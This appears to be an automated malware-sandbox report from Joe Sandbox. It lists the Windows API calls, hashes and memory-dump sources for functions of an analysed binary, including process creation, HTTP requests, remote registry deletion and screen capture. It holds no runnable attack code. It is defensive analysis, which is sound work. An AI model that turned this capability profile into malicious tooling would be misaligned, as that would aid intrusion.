                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7efc17e4edd2285912b0f288d2e4331d35789f5db50c2dc54f156a796e5eada2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FB106316087029FC320DF28C9A0B6AB7E5EF94766F54499DF99587291DB30D848CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B6BBF8
                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B6BC10
                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B6BC34
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B6BC60
                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B6BC74
                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B6BC96
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B6BD92
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B50F4E: GetStdHandle.KERNEL32(000000F6), ref: 00B50F6D
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B6BDAB
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B6BDC6
                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B6BE16
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00B6BE67
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B6BE99
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B6BEAA
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B6BEBC
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B6BECE
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B6BF43
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 99bab6d856ba836fd2dd85bc7efbaf4fc80bdd38251c83239c4028aee42cb4f8
                                                                                                                                                                                                                                                                                    • Instruction ID: cf92e60b1b679e246767222bdb1c1e6c66934d2477edaff69fce624f447a9b7f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99bab6d856ba836fd2dd85bc7efbaf4fc80bdd38251c83239c4028aee42cb4f8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF18B715043409FCB14EF24C991B6ABBF5EF84310F18899DF9899B2A2CB35ED85CB52
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00B7DCD0), ref: 00B64B18
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B64B2A
                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00B7DCD0), ref: 00B64B4F
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00B7DCD0), ref: 00B64B9B
                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,00B7DCD0), ref: 00B64C05
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000009), ref: 00B64CBF
                                                                                                                                                                                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B64D25
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00B64D4F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                    • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                                    • Opcode ID: c82539f41a363a0686085f4b4477857d56154223c62333436711ff1c4d4628c5
                                                                                                                                                                                                                                                                                    • Instruction ID: 98583d1c94bac5d61c2bb4108af254705460e148d0eb0ae063988bf6d9fa31ae
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c82539f41a363a0686085f4b4477857d56154223c62333436711ff1c4d4628c5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA122971A00505EFDB14DF94C884EAEBBF5FF85314F248498E909AB261DB35ED46CBA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00BB29C0), ref: 00B23F72
                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00BB29C0), ref: 00B24022
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00B24066
                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00B2406F
                                                                                                                                                                                                                                                                                    • TrackPopupMenuEx.USER32(00BB29C0,00000000,?,00000000,00000000,00000000), ref: 00B24082
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B2408E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                    • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                                    • Opcode ID: d5559930c7f2a6f91d9fa6916bdc7ca2cd2ef18700e00a710ea55d85c7b9dd44
                                                                                                                                                                                                                                                                                    • Instruction ID: b1b9f072e393efa93d6f88d514db7a08d8d2201751ce907f2ca6e309b872f9ab
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5559930c7f2a6f91d9fa6916bdc7ca2cd2ef18700e00a710ea55d85c7b9dd44
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E371E131604215BBEB219F29EC89FAABFF5FF04764F104246F618A61E0C7B5A950DB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,?), ref: 00B77823
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B77897
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B778B9
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B778CC
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00B778ED
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AE0000,00000000), ref: 00B7791C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B77935
                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00B7794E
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00B77955
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B7796D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B77985
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE2234: GetWindowLongW.USER32(?,000000EB), ref: 00AE2242
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                    • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                                    • Opcode ID: 56711ad8913afac0ccbd4c84e85024cf93101144816d7e86af153de4fbb42abc
                                                                                                                                                                                                                                                                                    • Instruction ID: ad4594ed0d2bdf57e32c994e8a4ede67c68cb19d2b07c663a0eb51708a71de65
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56711ad8913afac0ccbd4c84e85024cf93101144816d7e86af153de4fbb42abc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C717870148344AFD725CF18CC48F6ABBF9EF89300F0485AEF99997261CB70A946CB12
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
                                                                                                                                                                                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00B79BA3
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B780AE: ClientToScreen.USER32(?,?), ref: 00B780D4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B780AE: GetWindowRect.USER32(?,?), ref: 00B7814A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B780AE: PtInRect.USER32(?,?,?), ref: 00B7815A
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00B79C0C
                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B79C17
                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B79C3A
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B79C81
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00B79C9A
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00B79CB1
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00B79CD3
                                                                                                                                                                                                                                                                                    • DragFinish.SHELL32(?), ref: 00B79CDA
                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00B79DCD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                    • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                                    • Opcode ID: c8bbb9a70b97be9e3142072e5029b0650cfe7af4a43bc1bf1cbd85150e36c287
                                                                                                                                                                                                                                                                                    • Instruction ID: 8e0667babf9bbebf2e874ec9171690df50fc52ce62e195ae3715bd2d728282c6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8bbb9a70b97be9e3142072e5029b0650cfe7af4a43bc1bf1cbd85150e36c287
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC615871108341AFC705EF65CC89DABBBF8EF88750F40096DF5A9931A1DB709A49CB62
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B5CEF5
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B5CF08
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B5CF1C
                                                                                                                                                                                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B5CF35
                                                                                                                                                                                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00B5CF78
                                                                                                                                                                                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B5CF8E
                                                                                                                                                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B5CF99
                                                                                                                                                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B5CFC9
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B5D021
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B5D035
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00B5D040
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                    • Opcode ID: 53249dcac38fef99811f9cf697ed8fd4cb883fab5ae84d65dd99b5a08f521d9e
                                                                                                                                                                                                                                                                                    • Instruction ID: fb6829d8d0275491e6310fefbb52016726f88d895c575dec1b95e90415549c44
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53249dcac38fef99811f9cf697ed8fd4cb883fab5ae84d65dd99b5a08f521d9e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A513AB1500704BFDB219F60CC88BAA7BFDFF48786F04459AF94997250DB34D949AB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B766D6,?,?), ref: 00B78FEE
                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B766D6,?,?,00000000,?), ref: 00B78FFE
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B766D6,?,?,00000000,?), ref: 00B79009
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00B766D6,?,?,00000000,?), ref: 00B79016
                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B79024
                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B766D6,?,?,00000000,?), ref: 00B79033
                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B7903C
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00B766D6,?,?,00000000,?), ref: 00B79043
                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B766D6,?,?,00000000,?), ref: 00B79054
                                                                                                                                                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B80C04,?), ref: 00B7906D
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00B7907D
                                                                                                                                                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00B7909D
                                                                                                                                                                                                                                                                                    • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00B790CD
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B790F5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B7910B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 0b3d0f5d9c5ce22b5f7398b8f2f72cbea5958abd3ecc91bad112e666f79d21b7
                                                                                                                                                                                                                                                                                    • Instruction ID: 7b913ed71690b2c932ed763073c913f8d349fced91e3776ecdb7c19f29b6de9b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b3d0f5d9c5ce22b5f7398b8f2f72cbea5958abd3ecc91bad112e666f79d21b7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0413A75600208BFDB119F65DC88EAE7BB8FF89751F108059F91AE7260DB309D41DB20
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B6C10E,?,?), ref: 00B6D415
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D451
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D4C8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D4FE
                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B6C154
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B6C1D2
                                                                                                                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 00B6C26A
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00B6C2DE
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00B6C2FC
                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00B6C352
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B6C364
                                                                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B6C382
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00B6C3E3
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00B6C3F4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                    • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                    • Opcode ID: af6f100f5904287c0da5b9e9e01b3cb84a30edf81e1611d9c23c31449eac5ea1
                                                                                                                                                                                                                                                                                    • Instruction ID: 1b5f93c88f78cd2dccf3fd503ce362ad4058e0f45089c1126325897a5a29ef4d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af6f100f5904287c0da5b9e9e01b3cb84a30edf81e1611d9c23c31449eac5ea1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AC18D34204241AFD710DF25C495F2ABBE1FF85304F14859CE49A8B7A2CB79ED46CB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00B63035
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B63045
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00B63051
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00B6305E
                                                                                                                                                                                                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00B630CA
                                                                                                                                                                                                                                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00B63109
                                                                                                                                                                                                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00B6312D
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00B63135
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00B6313E
                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 00B63145
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00B63150
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
